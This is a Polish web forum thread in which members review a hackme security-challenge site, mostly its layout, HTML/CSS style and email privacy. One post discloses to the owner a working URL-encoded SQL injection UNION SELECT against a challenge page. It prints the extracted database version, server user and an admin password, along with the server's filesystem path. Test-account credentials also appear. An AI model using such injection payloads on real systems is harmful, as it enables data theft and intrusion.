Hackme, Prosze o ocene mojej strony Opcje

[maniekl2]

http://hackme.boo.pl

Proszę o ocenę mojej strony:
1) layout
2) treść (czyli głownie zadania)
3) bezpieczeństwo
4) Ogólne wrażenie

[ShadowD]

Na tło dal bym jakieś kreseczki bo przy ~1600/1000 monotonne jest strasznie, napis na logu zlewa się z nim.

Dodatkowo powinieneś ostawić jakieś testowe konto by nie trzeba było się rejestrować...

Ps Dwa błędy w html wypadało by poprawić... (IMG:http://forum.php.pl/style_emoticons/default/winksmiley.jpg)

Ten post edytował ShadowD 9.12.2008, 23:57:43

[erix]

4) Ogólne wrażenie

Pierwsze wrażenie? "Coś pusto tu".

1) layout

Schludny aż do przesady. (IMG:http://forum.php.pl/style_emoticons/default/tongue.gif)

2) treść (czyli głownie zadania)

:

Dodatkowo powinieneś ostawić jakieś testowe konto by nie trzeba było się rejestrować...

[maniekl2]

dodałem konto testowe i strona validuje się poprawnie

Login: tester
Hasło: test

Ten post edytował maniekl2 10.12.2008, 18:10:50

[timon27]

"<form>" też da się css-ować!
zrób to, gdyż na Twej stronie są inputy ze standardowym wyglądem i nie wygląda to dobrze.
Dodatkowo gdyby w tym górnym panelu były powoli spadające literki zamiast statycznego obrazu byłoby zaje..fajnie.

I za dużo bieli - gdzieś musisz dodać tło - w background może być ciemniejsze, w reszcie np. jasny błękit

Ten post edytował timon27 11.12.2008, 23:15:28

[lord_t]

@timonie27 owszem da się, ale to nie ma sensu, bo każda przeglądarka i tak pokaże to inaczej, że już nie wspomnę o niepoddawaniu się na style inputa do pobierania plików. (Widziałem gdzieś w necie stronę, na której były pokazane różne inputy z różnych przeglądarek, chętnie bym Cię tam odesłał, ale niestety nie znam adresu [może ktoś zna?]).

[erix]

http://www.456bereastreet.com/archive/2004..._form_controls/

[maniekl2]

Błękitny kolor nie pasował, więc na tło dodałem lekką szarość. Były chwilowe problemy z testerem bo ktoś zmienił hasło (IMG:http://forum.php.pl/style_emoticons/default/smile.gif) ale już jest wszystko w porządku. Można się logować:
Login: tester
Hasło : test

erix
Dzięki za link

Ten post edytował maniekl2 12.12.2008, 14:07:40

[JoShiMa]

Ogólne wrażenie:
1. Popracować nad kolorystyką:
2. Popracować nad typografią

Kod z początku wydawał się niczego sobie, choć wypadałoby choć jakies wcięcia stosować dla lepszej czytelności. Tak sobie przeglądałam i patrzę a tu taki kwiat:

[HTML] pobierz, plaintext 
<div id=text2>
<table id=news>
<tr><td id=newstytul>Witam</td></tr>
<tr><td id=newstresc><p>Witam  na hackme.boo.pl. Na razie występują tu tylko zadania związane z bezpieczeństwem stron www, ale w przyszłości zamierzam dodać także zadania matematyczne oraz związane z kryptografią.  A tymczasem zapraszam do rejestracji.</p>
</td></tr></table> 
<br>
</div>
[HTML] pobierz, plaintext 

Nie dość, że jednokolumnowa tabelka (nie wiadomo po co) to jeszcze w divie i w dodatku do zrobienia odstępu użyty znacznik <br>. A fuj...

Poza tym nigdzie nie zauważyłam choćby <h1> i nagle nie z gruszki ni z pietruszki w profilu wyskakuje <h4>

Takie coś:

[HTML] pobierz, plaintext 
Login: tester
<br>
Mail: cos@cos.pl <br>
 
Punkty: 5 <br>
Ranga: user<br>
[HTML] pobierz, plaintext 

To aż się prosi o listę <ul>

Na koniec taka uwaga. Namiętnie i z uporem maniaka pomijasz cudzysłowy w których powinny być wpisane wartości atrybutów znaczników, czasem tylko zamiast nich stosujesz apostrofy.

Hmmm Nie można zalogować się do nierozwiązanych zadań (IMG:http://forum.php.pl/style_emoticons/default/sad.gif)

[maniekl2]

Dzięki za rady. Postaram się to w najbliższym czasie poprawić.

Hmmm Nie można zalogować się do nierozwiązanych zadań (IMG:http://forum.php.pl/style_emoticons/default/sad.gif)

Nie rozumiem dokładnie o co Ci chodzi. Mógłbyś to rozwinąć ?

[JoShiMa]

Nie rozumiem dokładnie o co Ci chodzi. Mógłbyś to rozwinąć ?

Mogłabym

Otwieram listę zadań. Jest tylko jedna kategoria, WWW. Klikam na nią wyświetla się lista zadań. Klikam w zadanie pojawia się okno zachęcające do wpisania hasła. Wpisuję hasło i dowiaduję się, że jest nieprawidłowe i niniejszym nie mogę obejrzeć zadania.

[maniekl2]

Chyba źle zrozumiałaś po co jest tam to hasło.
Nad inputem do wpisania hasła jest link do zadania. Gdy rozwiążesz zadanie otrzymasz hasło, które musisz wpisać właśnie do tego inputa. Gdy to zrobisz otrzymasz punkty.

Wszystkie kwiatki poprawiłem (IMG:http://forum.php.pl/style_emoticons/default/smile.gif)

Ten post edytował maniekl2 12.12.2008, 20:00:58

[lord_t]

Przejrzyj wszystkie linki które wysyłasz na mejla. Bo ja dostałem raz coś takiego na początku linku:http://zadania.skate.boo.pl/

Przy okazji w tytule zjadło polską literę.

[maniekl2]

Nie wiem jak to możliwe że taki link dostałeś. Pokaż dokładnie jak wyglądała wiadomość.

[lord_t]

KLik : http://zadania.skate.boo.pl/zadanie12/haslo.html

[maniekl2]

Dzięki. Przenosiłem z innego serwera i dlatego wystąpił taki błąd.

[Kildyt]

To może i ja się wypowiem.

Wygląd:
Strona bez życia. Nic mnie w nim nie pociąga. Szarawe tło to bardzo kiepski pomysł. Amatorskie gradienty, za duże bordery. Bardzo kiepsko.
Logotyp nie jest klikalny. Wszędzie ten sam, mdły kolor. Brak wyróżnienia pozycji menu, w której aktualnie się znajdujemy.
Ogólnie: 3/10

Kod html:
Brak jakiejkolwiek tabulacji! Słowa kluczowe za mało mówiące o stronie, a opis jest genialny. Dlaczego nazwy class w divach nie wpisujesz w cudzysłowach? Następnym razem daj do oceny kod nad którym pracowałeś więcej niż godzinkę.
Ogólnie: 2/10.

Kod css:
Brak tabulacji!

[HTML] pobierz, plaintext 
font-family: "Trebuchet MS";
[HTML] pobierz, plaintext 

Używaj bardziej uniwersalnych czcionek, a jeżeli już musisz taką podać, to jako drugą w kolejności wpisz uniwersalną. Nie ujednolicasz sobie pisania kodu css. Zauważyłem, że czasami na początku dasz padding-i, a czasami font-y. Musisz zastosować hierarchię. Wtedy będzie Ci się łatwiej edytowało kod.

[HTML] pobierz, plaintext 
border-style: solid;
border-width: 2px;
border-color: #337de1;
[HTML] pobierz, plaintext 

Takie coś robi się za pomocą samego border-a.

Działanie:
Po zalogowaniu się muszę kliknąć "Dalej". Czy nie lepiej od razu odświeżyć stronę? Chciałem zobaczyć o co chodzi z tą stroną, ale w pierwszym zadaniu wyświetla brak pliku.

Ten post edytował Kildyt 13.12.2008, 12:31:10

[maniekl2]

Przyznaję że nie potrafię robić layoutów. Nie mam daru do łączenia kolorów dlatego i tak jestem zadowolony z tego co stworzyłem.
Ale dzięki za krytykę. Na pewno da mi to coś do myślenia. Opisy, kod są jakie są, bo nie przykładałem się do nich. Bardziej myślałem nad kodem php. Ale w najbliższym czasie popracuję nad tym kodem html i css.

Działanie:
Po zalogowaniu się muszę kliknąć "Dalej". Czy nie lepiej od razu odświeżyć stronę? Chciałem zobaczyć o co chodzi z tą stroną, ale w pierwszym zadaniu wyświetla brak pliku.

Zastanawiałem się nad tym odświeżaniem strony, ale wybrałem link "Dalej". Możliwe że to zmienię.

Przepraszam za to pierwsze zadanie. Wczoraj niechcący usunąłem jeden plik. Już jest wszystko w porządku.

Ten post edytował maniekl2 13.12.2008, 10:29:37

[AjaxSrajax]

Kod css:
Brak tabulacji!

[CSS] pobierz, plaintext 
font-family: "Trebuchet MS";
[CSS] pobierz, plaintext 

Używaj bardziej uniwersalnych czcionek, a jeżeli już musisz taką podać, to jako drugą w kolejności wpisz uniwersalną.

Trebuchet MS nie jest uniwersalny wg. Ciebie? To jedna z najczęściej używanych czcionek dzisiaj. Ale fakt, że wers CSS powinien brzmieć:

Kod

font-family: "Trebuchet MS", sans-serif;

Dodanie 'sans-serif' chyba wiadomo co spowoduje;)

Nie ujednolicasz sobie pisania kodu css. Zauważyłem, że czasami na początku dasz padding-i, a czasami font-y.
Musisz zastosować hierarchię. Wtedy będzie Ci się łatwiej edytowało kod.

Ciekawa teoria, ale chyba niewykonalna. Z tego względu, że pisząc kod CSS zwłaszcza pod windowsem testujesz, sprawdzasz dodajesz i odejmujesz wersy i patrzysz jaki jest efekt. Ciężko zachować tę samą kolejność, zresztą kod CSS jest tak prosty, że nie ma tam za bardzo co analizować (IMG:http://forum.php.pl/style_emoticons/default/winksmiley.jpg)

[Kildyt]

Trebuchet MS nie jest uniwersalny wg. Ciebie? To jedna z najczęściej używanych czcionek dzisiaj.

Gdzie ty żyjesz? (IMG:http://forum.php.pl/style_emoticons/default/tongue.gif) Dwie magiczne litery na końcu nazwy fonta mówią wszystko. (IMG:http://forum.php.pl/style_emoticons/default/smile.gif) Sprawdziłem na ubuntu 8.10 i takiej czcionki nie ma, a paczki z windowsowskimi czcionkami jak na razie nie zainstalowałem.

Ciekawa teoria, ale chyba niewykonalna. Z tego względu, że pisząc kod CSS zwłaszcza pod windowsem testujesz, sprawdzasz dodajesz i odejmujesz wersy i patrzysz jaki jest efekt. Ciężko zachować tę samą kolejność, zresztą kod CSS jest tak prosty, że nie ma tam za bardzo co analizować (IMG:http://forum.php.pl/style_emoticons/default/winksmiley.jpg)

Jak to niewykonalna? (IMG:http://forum.php.pl/style_emoticons/default/tongue.gif) Ja jakoś sobie radzę i bardzo ułatwia mi to pracę. Mam taki system (od góry): definiowanie bloku, font-y, rozmiary, background-y, border-y, padding-i, margin-y. Te 3 ostatnie kiedyś mieszałem, ale ostatnio trzymam się zasady.

[AjaxSrajax]

Gdzie ty żyjesz? (IMG:http://forum.php.pl/style_emoticons/default/tongue.gif) Dwie magiczne litery na końcu nazwy fonta mówią wszystko. (IMG:http://forum.php.pl/style_emoticons/default/smile.gif) Sprawdziłem na ubuntu 8.10 i takiej czcionki nie ma, a paczki z windowsowskimi czcionkami jak na razie nie zainstalowałem.

Tak niestety jest, Trebuchet MS jest wszędzie, nie tylko na stronach, ale b. często w reklamach, szyldach itp.
Spoko, też mam Ubuntu i wiem, że nie ma (IMG:http://forum.php.pl/style_emoticons/default/winksmiley.jpg) Ale mam też windę i nie znam żadnej czcionki bezszeryfowej, która jest i pod Linuksa i pod Windowsa dostępna jako standard. Po prostu dodajesz sans-serif na końcu i użytkownicy windy mają np. Trebuchet, Verdane, czy Arial, a linuksowcy zobaczą np. DejaVu SansSerif (IMG:http://forum.php.pl/style_emoticons/default/winksmiley.jpg)

Jak to niewykonalna? (IMG:http://forum.php.pl/style_emoticons/default/tongue.gif) Ja jakoś sobie radzę i bardzo ułatwia mi to pracę. Mam taki system (od góry): definiowanie bloku, font-y, rozmiary, background-y, border-y, padding-i, margin-y. Te 3 ostatnie kiedyś mieszałem, ale ostatnio trzymam się zasady.

No to tak trzymaj. Jednak jesteś jedyną osobą jaką znam, która tak postępuje (IMG:http://forum.php.pl/style_emoticons/default/smile.gif)

pzdr;

[lord_t]

Kod html:
Brak jakiejkolwiek tabulacji![...]

Kod css:
Brak tabulacji! [...]

A co Ci do tych tabulacji?! Im mniej białych znaków tym lżejszy plik. Przeglądarce nie robią one żadnej różnicy(!), a jeśli sam chcesz analizować źródło to możesz sobie skorzystać z Firebuga i będziesz miał wcięcia.

Zauważyłem, że czasami na początku dasz padding-i, a czasami font-y. Musisz zastosować hierarchię. Wtedy będzie Ci się łatwiej edytowało kod.

Osobiście nie hierarchizuje styli w {} i nie wcale nie mam trudniej.

[Kildyt]

A co Ci do tych tabulacji?! Im mniej białych znaków tym lżejszy plik. Przeglądarce nie robią one żadnej różnicy(!), a jeśli sam chcesz analizować

Wybacz, ale chyba nigdy nie napisałeś bardziej złożonego kodu. Pokaż mi porządną stronę bez tabulacji! Pokaż mi złożoną klasę w php bez tabulacji! Pisz 3 warunki i każdy kolejny w poprzednim. Ciekawe ile będziesz główkował co do czego. Zapraszam na PW, żeby nie robić off-topa.

Osobiście nie hierarchizuje styli w {} i nie wcale nie mam trudniej.

Kto jak lubi. Mi to ułatwia i przestrzegam wytyczonej hierarchii.

Ten post edytował Kildyt 13.12.2008, 18:12:37

[lord_t]

Hola kolego, nie mówimy o kodzie php, o html i css. [koniec oftopa /]

[ShadowD]

Hmmm, zadania mają złą kolejność np zadanie 9 (Bez hasła) za pierwszym razem poszło a nad tymi za 10pkt siedziałem i nic... ;p

[maniekl2]

To zależy dla kogo. Dla jednego zadanie związane z JS jest banalne dla drugiego nie. Zadania w których można podejrzeć źródło są mniej punktowane. Czyli JS i proste zadania w których właściwie wystarczy spojrzeć w źródło. Zaś te w których nie da się podejrzeć źródłą skryptu są więcej punktowane, gdyz musisz poprostu domyślić się jak dany skrypt jest zbudowany.

[JoShiMa]

Nie mam daru do łączenia kolorów dlatego

Dlatego powinieneś zacząć używac programó, któe są pomocne przy dobieraniu kolorystyki (sporo tego w sieci jest).

Opisy, kod są jakie są, bo nie przykładałem się do nich. Bardziej myślałem nad kodem php. Ale w najbliższym czasie popracuję nad tym kodem html i css.

No to ja bym się wstydziła przyznać do tego, że dałam do oceny kod do którego się nie przyłożyłam (IMG:http://forum.php.pl/style_emoticons/default/wstydnis.gif)

[maniekl2]

Bardzo często przychodzi mi mail "Mail delivery failed: returning message to sender", przez to że użytkownicy podają nie istniejące adresy email. I teraz pytanie do Was. Czy jest możliwość sprawdzenia przez skrypt php, czy dany adres email istnieje ?

Ten post edytował maniekl2 15.12.2008, 20:17:54

[timon27]

@timonie27 owszem da się, ale to nie ma sensu, bo każda przeglądarka i tak pokaże to inaczej, że już nie wspomnę o niepoddawaniu się na style inputa do pobierania plików. (Widziałem gdzieś w necie stronę, na której były pokazane różne inputy z różnych przeglądarek, chętnie bym Cię tam odesłał, ale niestety nie znam adresu [może ktoś zna?]).

Nie zgodzę sie z tym. Poza tym popatrz na fora (np na TO) inputy są poważnie przetworzone (nie tylko kolory, obramowanie, ale i wielkość i krój czcionki). Wyobraź Sobie jak forum php.pl wyglądałoby ze standardowymi inputami. A w wielu przeglądarkach sprawdzałem i wyglądają tak samo.

Bardzo często przychodzi mi mail "Mail delivery failed: returning message to sender", przez to że użytkownicy podają nie istniejące adresy email. I teraz pytanie do Was. Czy jest możliwość sprawdzenia przez skrypt php, czy dany adres email istnieje ?

Nie. A przynajmniej nic o takiej techologi nie słyszałem (po samej nazwie nie poznaszbo każdy może mieć konto na własnym serwerze).
Możesz jedynie sprawdzać podstawowe sprawy jak:
-czy w adresie znajduje się dokładnie jedna małpa
-czy po małpie jest co najmniej jedna kropka
itp
Zazwyczaj tak się to robi.

[pyro]

pelna sciezka do twoich zadanek:

Kod

/home/accounts_m/maniekl2/public_html/zadania/

uwazaj troche co piszesz...

generalnie duzo mozna sie dowiedziec o tym co tam trzymasz u siebie:

np. takie zapytanie:

Kod

http://zadania.hackme.boo.pl/zadanie10/index.php?login=a%27%20UNION%20SELECT%20concat(%27Wersja%20MySQL:%20%27,@@version,%27%3Cbr%20/%3ESystemik:%20%27,@@version_compile_os,%27%3Cbr%20/%3EAktualnie%20zalogowany%20user:%20%27,USER()),concat(%27%3Cbr%20/%3E%3Cbr%20/%3Ehaslo:%20%27,haslo)%20from%20administracja/*

wynik:

Kod

Wersja MySQL: 4.1.22-log
Systemik: pld-linux-gnu
Aktualnie zalogowany user: sql_hczadania@10.219.118.5 ||

haslo: asd!@#s

// edit

generalnie nie powinno sie ujawniac takich informacji (IMG:http://forum.php.pl/style_emoticons/default/tongue.gif)

Strona merytoryczna: ogólnie lubie hackme... twoje jest troche proste, zrobilem all zadania prócz ostatniego jak narazie, design bardzo lekki

Ten post edytował pyro 16.12.2008, 01:03:42

[maniekl2]

Nie. A przynajmniej nic o takiej techologi nie słyszałem (po samej nazwie nie poznaszbo każdy może mieć konto na własnym serwerze).
Możesz jedynie sprawdzać podstawowe sprawy jak:
-czy w adresie znajduje się dokładnie jedna małpa
-czy po małpie jest co najmniej jedna kropka
itp
Zazwyczaj tak się to robi.

Tak już mam zrobione.

Kod

/home/accounts_m/maniekl2/public_html/zadania/

Kod

http://zadania.hackme.boo.pl/zadanie10/index.php?login=a%27%20UNION%20SELECT%20concat(%27Wersja%20MySQL:%20%27,@@version,%27%3Cbr%20/%3ESystemik:%20%27,@@version_compile_os,%27%3Cbr%20/%3EAktualnie%20zalogowany%20user:%20%27,USER()),concat(%27%3Cbr%20/%3E%3Cbr%20/%3Ehaslo:%20%27,haslo)%20from%20administracja/*

wynik:

Kod

Wersja MySQL: 4.1.22-log
    Systemik: pld-linux-gnu
    Aktualnie zalogowany user: sql_hczadania@10.219.118.5 ||
    
    haslo: asd!@#s

Tylko jak zabezpieczyć się przed tym ? Skoro zadanie polega na SQL injection ?

Ten post edytował maniekl2 16.12.2008, 17:53:06

[pyro]

co do ścieżek to ustaw jakis error_handler

co do mysqla to moze jakies wyrażonka regularne?

Ten post edytował pyro 17.12.2008, 21:53:58

[maniekl2]

A w jaki sposób zdobyłeś tą ścieżkę ?

Ten post edytował maniekl2 16.12.2008, 21:44:50

[pyro]

w ktoryms z zadań (nie tylko w jednym) wsytarczylo podawac w zmiennych jakies bledne dane, naprzyklad bylo takie zadanie z bledem LFI, tam podalem jakies dane, bo myslalem za pierwszym razem ze to SQL Injection i wyskoczyl blad...

[bartg]

Mógłbyś oznaczać jakoś zrobione zadania. Niektóre chce na przykład zostawi na potem i teraz nie wiem które rozwiązałem a które nie (IMG:http://forum.php.pl/style_emoticons/default/smile.gif)

[Athlan]

"Hasło nie poprawne"

niepoprawne pisze się razem, nie oddzielnie (IMG:http://forum.php.pl/style_emoticons/default/tongue.gif)

[maniekl2]

niepoprawne pisze się razem, nie oddzielnie (IMG:http://forum.php.pl/style_emoticons/default/tongue.gif)

Dzięki, poprawione, choć nie jestem pewien czy w każdym pliku poprawiłem.

Mógłbyś oznaczać jakoś zrobione zadania. Niektóre chce na przykład zostawi na potem i teraz nie wiem które rozwiązałem a które nie (IMG:http://forum.php.pl/style_emoticons/default/smile.gif)

Miałem to w planach wcześniej. Niedługo to dodam.

Ten post edytował maniekl2 7.01.2009, 22:19:33

[Athlan]

Miałem to w planach wcześniej. Niedługo to dodam.

Super by było, bo jak znajdę trochę czasu, chętnie powrócę do gry, żeby mieć wyższe miejsce w rankingu.

[Spawnm]

jak jest link do zadania , np:

Zdobądź hasło na stronę.
Oto link od zadnia :
http://zadania.hackme.boo.pl/zadanie2/

to mógł by się otwierać w nowej karcie...

[maniekl2]

Poprawione...

Athlan: A odnośnie tego sprawdzania to jak wejdziesz w zadania to jeżeli jest zrobione pokaże się napis:

*pole do wpisania hasła nie pojawia jeżeli już zrobiłeś to zadanie

[Athlan]

Athlan: A odnośnie tego sprawdzania to jak wejdziesz w zadania to jeżeli jest zrobione pokaże się napis:

Ale muszę wchodzić w każdy task. To tak jakbyś nie miał na forum oznaczonych tematów nieprzeczytanych i musiał klikać w każdy, żeby sprawdzić, czy doszedł jakiś post.

[maniekl2]

Ja nie powiedziałem, że tak zostanie.Tylko to może ci posłużyć tymczasowo.

[nospor]

wchodząc w podglad usera widzę jego email (IMG:http://forum.php.pl/style_emoticons/default/blinksmiley.gif)
No jak tak traktujesz swoich userow, ze upubliczniasz ich adresy email, to ja dziekuje za taki serwis...

no chyba ze user jawnie wyraził zgodę na otrzymywanie spamu przez spamboty, ktore w ten sposób zdobedą jego email

[Babcia@Stefa]

Moim skromnym zdaniem jest tak:
- Witryna "daje frajde" z hackowania bazy danych itp - sprawdzenia umiejętności (...), ale sam autor nie umie się zabezpieczyć przed takimi atakami.

Design: 4/10 - Białe standardowe tło jest brzydkie, spróbuj inny kolor, może jakieś lekkie paski? eee... nie nie pasuje.

Pozdrawiam, WebNuLL

[Athlan]

wchodząc w podglad usera widzę jego email

Właśnie jeszcze o tym miałem napisać, ale wyleciało mi z głowy. Nie życzę sobie podawania mojego adresu email publicznie. Nie akceptowałem żadnego regulaminu i nie miałem do przeczytania żadnej polityki prywatności.

Proszę o usunięcie z mojego profilu adresu emailowego. (bo spamboty przyjdą, zabiorą i dostane spama ;p)

[maniekl2]

Za ten email przepraszam, jestem właśnie podczas dodawania możliwości ukrycia emaila.

[nospor]

jestem właśnie podczas dodawania możliwości ukrycia emaila

To nie jest jakis malutki bug. Zanim dodasz te mozliwosc, najzwyklej w swiecie go do tej pory nie wyswietlaj.
Po dodaniu tej mozliwosci domyslnie ustaw ze ludziom sie nie wyswietla. Nie sądze by ktos wogole chcial go ustawiac by wyswietlal

[maniekl2]

To nie jest jakis malutki bug. Zanim dodasz te mozliwosc, najzwyklej w swiecie go do tej pory nie wyswietlaj.
Po dodaniu tej mozliwosci domyslnie ustaw ze ludziom sie nie wyswietla. Nie sądze by ktos wogole chcial go ustawiac by wyswietlal

Dokładnie tak zrobiłem zanim przeczytałem twój post

[Spawnm]

w zadaniach kod html jest zły:P
przykład:

[HTML] pobierz, plaintext 
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
</head><html>
<form action=login.php method=post>
Login : <input type=text name=login> <br>
Hasło : <input type=password name=haslo> <br>
<input type=submit value=Loguj>
</form>
Zły login lub hasło
</html>
[HTML] pobierz, plaintext